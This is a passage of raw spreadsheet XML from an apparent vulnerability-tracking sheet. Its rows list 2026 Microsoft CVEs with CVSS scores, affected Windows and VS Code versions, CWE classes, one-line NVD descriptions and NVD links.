s="5" t="inlineStr"><is><t>CWE-280</t></is></c><c r="R914" s="5" t="inlineStr"><is><t>Improper handling of insufficient permissions or privileges in Windows Enterprise App Management allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S914" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69907</t></is></c></row><row r="915"><c r="A915" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B915" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C915" s="5" t="inlineStr"><is><t>CVE-2026-69921</t></is></c><c r="D915" s="5" t="n"><v>7.8</v></c><c r="E915" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F915" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G915" s="5" t="inlineStr" /><c r="H915" s="5" t="n"><v>0.003</v></c><c r="I915" s="5" t="inlineStr" /><c r="J915" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K915" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L915" s="5" t="inlineStr" /><c r="M915" s="5" t="inlineStr" /><c r="N915" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O915" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P915" s="5" t="inlineStr" /><c r="Q915" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R915" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S915" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t></is></c></row><row r="916"><c r="A916" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B916" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C916" s="5" t="inlineStr"><is><t>CVE-2026-70289</t></is></c><c r="D916" s="5" t="n"><v>7.8</v></c><c r="E916" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F916" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G916" s="5" t="inlineStr" /><c r="H916" s="5" t="n"><v>0.003</v></c><c r="I916" s="5" t="inlineStr" /><c r="J916" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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6" s="5" t="inlineStr" /><c r="M916" s="5" t="inlineStr" /><c r="N916" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O916" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P916" s="5" t="inlineStr" /><c r="Q916" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R916" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S916" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t></is></c></row><row r="917"><c r="A917" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B917" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C917" s="5" t="inlineStr"><is><t>CVE-2026-70334</t></is></c><c r="D917" s="5" t="n"><v>7.8</v></c><c r="E917" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F917" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G917" s="5" t="inlineStr" /><c r="H917" s="5" t="n"><v>0.004</v></c><c r="I917" s="5" t="inlineStr" /><c r="J917" s="5" t="inlineStr" /><c r="K917" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L917" s="5" t="inlineStr" /><c r="M917" s="5" t="inlineStr" /><c r="N917" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O917" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P917" s="5" t="inlineStr" /><c r="Q917" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="R917" s="5" t="inlineStr"><is><t>Incomplete list of disallowed inputs in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.</t></is></c><c r="S917" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70334</t></is></c></row><row r="918"><c r="A918" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B918" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C918" s="5" t="inlineStr"><is><t>CVE-2026-70564</t></is></c><c r="D918" s="5" t="n"><v>7.8</v></c><c r="E918" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F918" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G918" s="5" t="inlineStr" /><c r="H918" s="5" t="n"><v>0.003</v></c><c r="I918" s="5" t="inlineStr" /><c r="J918" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K91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18" s="5" t="inlineStr" /><c r="M918" s="5" t="inlineStr" /><c r="N918" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O918" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P918" s="5" t="inlineStr" /><c r="Q918" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R918" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S918" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t></is></c></row><row r="919"><c r="A919" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B919" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C919" s="5" t="inlineStr"><is><t>CVE-2026-70569</t></is></c><c r="D919" s="5" t="n"><v>7.8</v></c><c r="E919" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F919" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G919" s="5" t="inlineStr" /><c r="H919" s="5" t="n"><v>0.003</v></c><c r="I919" s="5" t="inlineStr" /><c r="J919" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K919" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L919" s="5" t="inlineStr" /><c r="M919" s="5" t="inlineStr" /><c r="N919" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O919" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P919" s="5" t="inlineStr" /><c r="Q919" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R919" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S919" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t></is></c></row><row r="920"><c r="A920" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B920" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C920" s="5" t="inlineStr"><is><t>CVE-2026-70572</t></is></c><c r="D920" s="5" t="n"><v>7.8</v></c><c r="E920" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F920" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G920" s="5" t="inlineStr" /><c r="H920" s="5" t="n"><v>0.003</v></c><c r="I920" s="5" t="inlineStr" /><c r="J920" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K92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20" s="5" t="inlineStr" /><c r="M920" s="5" t="inlineStr" /><c r="N920" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O920" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P920" s="5" t="inlineStr" /><c r="Q920" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R920" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S920" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t></is></c></row><row r="921"><c r="A921" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B921" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C921" s="5" t="inlineStr"><is><t>CVE-2026-70574</t></is></c><c r="D921" s="5" t="n"><v>7.8</v></c><c r="E921" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F921" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G921" s="5" t="inlineStr" /><c r="H921" s="5" t="n"><v>0.003</v></c><c r="I921" s="5" t="inlineStr" /><c r="J921" s="5" t="inlineStr" /><c r="K921" s="5" t="inlineStr" /><c r="L921" s="5" t="inlineStr" /><c r="M921" s="5" t="inlineStr" /><c r="N921" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O921" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P921" s="5" t="inlineStr" /><c r="Q921" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R921" s="5" t="inlineStr"><is><t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S921" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70574</t></is></c></row><row r="922"><c r="A922" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B922" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C922" s="5" t="inlineStr"><is><t>CVE-2026-70581</t></is></c><c r="D922" s="5" t="n"><v>7.8</v></c><c r="E922" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F922" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G922" s="5" t="inlineStr" /><c r="H922" s="5" t="n"><v>0.003</v></c><c r="I922" s="5" t="inlineStr" /><c r="J922" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K92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22" s="5" t="inlineStr" /><c r="M922" s="5" t="inlineStr" /><c r="N922" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O922" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P922" s="5" t="inlineStr" /><c r="Q922" s="5" t="inlineStr"><is><t>CWE-190, CWE-20</t></is></c><c r="R922" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S922" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t></is></c></row><row r="923"><c r="A923" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B923" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C923" s="5" t="inlineStr"><is><t>CVE-2026-70583</t></is></c><c r="D923" s="5" t="n"><v>7.8</v></c><c r="E923" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F923" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G923" s="5" t="inlineStr" /><c r="H923" s="5" t="n"><v>0.003</v></c><c r="I923" s="5" t="inlineStr" /><c r="J923" s="5" t="inlineStr" /><c r="K923" s="5" t="inlineStr" /><c r="L923" s="5" t="inlineStr" /><c r="M923" s="5" t="inlineStr" /><c r="N923" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O923" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P923" s="5" t="inlineStr" /><c r="Q923" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R923" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S923" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70583</t></is></c></row><row r="924"><c r="A924" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B924" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C924" s="5" t="inlineStr"><is><t>CVE-2026-70584</t></is></c><c r="D924" s="5" t="n"><v>7.8</v></c><c r="E924" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F924" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G924" s="5" t="inlineStr" /><c r="H924" s="5" t="n"><v>0.003</v></c><c r="I924" s="5" t="inlineStr" /><c r="J924" s="5" t="inlineStr" /><c r="K924" s="5" t="inlineStr" /><c r="L924" s="5" t="inlineStr" /><c r="M924" s="5" t="inlineStr" /><c r="N924" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O924" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P924" s="5" t="inlineStr" /><c r="Q924" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="R924" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S924" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70584</t></is></c></row><row r="925"><c r="A925" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B925" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C925" s="5" t="inlineStr"><is><t>CVE-2026-71334</t></is></c><c r="D925" s="5" t="n"><v>7.8</v></c><c r="E925" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F925" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G925" s="5" t="inlineStr" /><c r="H925" s="5" t="n"><v>0.002</v></c><c r="I925" s="5" t="inlineStr" /><c r="J925" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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5" s="5" t="inlineStr" /><c r="M925" s="5" t="inlineStr" /><c r="N925" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O925" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P925" s="5" t="inlineStr" /><c r="Q925" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R925" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S925" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t></is></c></row><row r="926"><c r="A926" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B926" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C926" s="5" t="inlineStr"><is><t>CVE-2026-71337</t></is></c><c r="D926" s="5" t="n"><v>7.8</v></c><c r="E926" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F926" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G926" s="5" t="inlineStr" /><c r="H926" s="5" t="n"><v>0.003</v></c><c r="I926" s="5" t="inlineStr" /><c r="J926" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K926" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L926" s="5" t="inlineStr" /><c r="M926" s="5" t="inlineStr" /><c r="N926" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O926" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P926" s="5" t="inlineStr" /><c r="Q926" s="5" t="inlineStr"><is><t>CWE-121, CWE-130</t></is></c><c r="R926" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S926" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t></is></c></row><row r="927"><c r="A927" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B927" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C927" s="5" t="inlineStr"><is><t>CVE-2026-71343</t></is></c><c r="D927" s="5" t="n"><v>7.8</v></c><c r="E927" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F927" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G927" s="5" t="inlineStr" /><c r="H927" s="5" t="n"><v>0.003</v></c><c r="I927" s="5" t="inlineStr" /><c r="J927" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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27" s="5" t="inlineStr" /><c r="M927" s="5" t="inlineStr" /><c r="N927" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O927" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P927" s="5" t="inlineStr" /><c r="Q927" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R927" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t></is></c><c r="S927" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t></is></c></row><row r="928"><c r="A928" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B928" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C928" s="5" t="inlineStr"><is><t>CVE-2026-71345</t></is></c><c r="D928" s="5" t="n"><v>7.8</v></c><c r="E928" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F928" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G928" s="5" t="inlineStr" /><c r="H928" s="5" t="n"><v>0.003</v></c><c r="I928" s="5" t="inlineStr" /><c r="J928" s="5" t="inlineStr" /><c r="K928" s="5" t="inlineStr" /><c r="L928" s="5" t="inlineStr" /><c r="M928" s="5" t="inlineStr" /><c r="N928" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O928" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P928" s="5" t="inlineStr" /><c r="Q928" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R928" s="5" t="inlineStr"><is><t>Out-of-bounds write in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="S928" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71345</t></is></c></row><row r="929"><c r="A929" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B929" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C929" s="5" t="inlineStr"><is><t>CVE-2026-72929</t></is></c><c r="D929" s="5" t="n"><v>7.8</v></c><c r="E929" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F929" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G929" s="5" t="inlineStr" /><c r="H929" s="5" t="n"><v>0.002</v></c><c r="I929" s="5" t="inlineStr" /><c r="J929" s="5" t="inlineStr" /><c r="K929" s="5" t="inlineStr" /><c r="L929" s="5" t="inlineStr" /><c r="M929" s="5" t="inlineStr" /><c r="N929" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O929" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P929" s="5" t="inlineStr" /><c r="Q929" s="5" t="inlineStr"><is><t>CWE-354</t></is></c><c r="R929" s="5" t="inlineStr"><is><t>Improper validation of integrity check value in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S929" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72929</t></is></c></row><row r="930"><c r="A930" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B930" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C930" s="5" t="inlineStr"><is><t>CVE-2026-72941</t></is></c><c r="D930" s="5" t="n"><v>7.8</v></c><c r="E930" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F930" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G930" s="5" t="inlineStr" /><c r="H930" s="5" t="n"><v>0.003</v></c><c r="I930" s="5" t="inlineStr" /><c r="J930" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K93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30" s="5" t="inlineStr" /><c r="M930" s="5" t="inlineStr" /><c r="N930" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O930" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P930" s="5" t="inlineStr" /><c r="Q930" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R930" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S930" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t></is></c></row><row r="931"><c r="A931" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B931" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C931" s="5" t="inlineStr"><is><t>CVE-2026-72944</t></is></c><c r="D931" s="5" t="n"><v>7.8</v></c><c r="E931" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F931" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G931" s="5" t="inlineStr" /><c r="H931" s="5" t="n"><v>0.003</v></c><c r="I931" s="5" t="inlineStr" /><c r="J931" s="5" t="inlineStr" /><c r="K931" s="5" t="inlineStr" /><c r="L931" s="5" t="inlineStr" /><c r="M931" s="5" t="inlineStr" /><c r="N931" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O931" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P931" s="5" t="inlineStr" /><c r="Q931" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R931" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S931" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72944</t></is></c></row><row r="932"><c r="A932" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B932" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C932" s="5" t="inlineStr"><is><t>CVE-2026-72946</t></is></c><c r="D932" s="5" t="n"><v>7.8</v></c><c r="E932" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F932" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G932" s="5" t="inlineStr" /><c r="H932" s="5" t="n"><v>0.003</v></c><c r="I932" s="5" t="inlineStr" /><c r="J932" s="5" t="inlineStr" /><c r="K932" s="5" t="inlineStr" /><c r="L932" s="5" t="inlineStr" /><c r="M932" s="5" t="inlineStr" /><c r="N932" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O932" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P932" s="5" t="inlineStr" /><c r="Q932" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R932" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Storage Port Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S932" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72946</t></is></c></row><row r="933"><c r="A933" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B933" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C933" s="5" t="inlineStr"><is><t>CVE-2026-72953</t></is></c><c r="D933" s="5" t="n"><v>7.8</v></c><c r="E933" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F933" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G933" s="5" t="inlineStr" /><c r="H933" s="5" t="n"><v>0.003</v></c><c r="I933" s="5" t="inlineStr" /><c r="J933" s="5" t="inlineStr" /><c r="K933" s="5" t="inlineStr" /><c r="L933" s="5" t="inlineStr" /><c r="M933" s="5" t="inlineStr" /><c r="N933" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O933" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P933" s="5" t="inlineStr" /><c r="Q933" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R933" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S933" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72953</t></is></c></row><row r="934"><c r="A934" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B934" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C934" s="5" t="inlineStr"><is><t>CVE-2026-72957</t></is></c><c r="D934" s="5" t="n"><v>7.8</v></c><c r="E934" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F934" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G934" s="5" t="inlineStr" /><c r="H934" s="5" t="n"><v>0.003</v></c><c r="I934" s="5" t="inlineStr" /><c r="J934" s="5" t="inlineStr" /><c r="K934" s="5" t="inlineStr" /><c r="L934" s="5" t="inlineStr" /><c r="M934" s="5" t="inlineStr" /><c r="N934" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O934" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P934" s="5" t="inlineStr" /><c r="Q934" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R934" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Deployment Services allows an authorized attacker to execute code locally.</t></is></c><c r="S934" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72957</t></is></c></row><row r="935"><c r="A935" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B935" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C935" s="5" t="inlineStr"><is><t>CVE-2026-72965</t></is></c><c r="D935" s="5" t="n"><v>7.8</v></c><c r="E935" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F935" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G935" s="5" t="inlineStr" /><c r="H935" s="5" t="n"><v>0.003</v></c><c r="I935" s="5" t="inlineStr" /><c r="J935" s="5" t="inlineStr" /><c r="K935" s="5" t="inlineStr" /><c r="L935" s="5" t="inlineStr" /><c r="M935" s="5" t="inlineStr" /><c r="N935" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O935" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P935" s="5" t="inlineStr" /><c r="Q935" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R935" s="5" t="inlineStr"><is><t>Use after free in Windows WebClient Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S935" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72965</t></is></c></row><row r="936"><c r="A936" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B936" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C936" s="5" t="inlineStr"><is><t>CVE-2026-72967</t></is></c><c r="D936" s="5" t="n"><v>7.8</v></c><c r="E936" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F936" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G936" s="5" t="inlineStr" /><c r="H936" s="5" t="n"><v>0.003</v></c><c r="I936" s="5" t="inlineStr" /><c r="J936" s="5" t="inlineStr" /><c r="K936" s="5" t="inlineStr" /><c r="L936" s="5" t="inlineStr" /><c r="M936" s="5" t="inlineStr" /><c r="N936" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O936" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P936" s="5" t="inlineStr" /><c r="Q936" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R936" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Network Connection Broker allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S936" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72967</t></is></c></row><row r="937"><c r="A937" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B937" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C937" s="5" t="inlineStr"><is><t>CVE-2026-72988</t></is></c><c r="D937" s="5" t="n"><v>7.8</v></c><c r="E937" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F937" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G937" s="5" t="inlineStr" /><c r="H937" s="5" t="n"><v>0.002</v></c><c r="I937" s="5" t="inlineStr" /><c r="J937" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K93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37" s="5" t="inlineStr" /><c r="M937" s="5" t="inlineStr" /><c r="N937" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O937" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P937" s="5" t="inlineStr" /><c r="Q937" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R937" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S937" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t></is></c></row><row r="938"><c r="A938" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B938" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C938" s="5" t="inlineStr"><is><t>CVE-2026-72990</t></is></c><c r="D938" s="5" t="n"><v>7.8</v></c><c r="E938" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F938" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G938" s="5" t="inlineStr" /><c r="H938" s="5" t="n"><v>0.003</v></c><c r="I938" s="5" t="inlineStr" /><c r="J938" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K93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38" s="5" 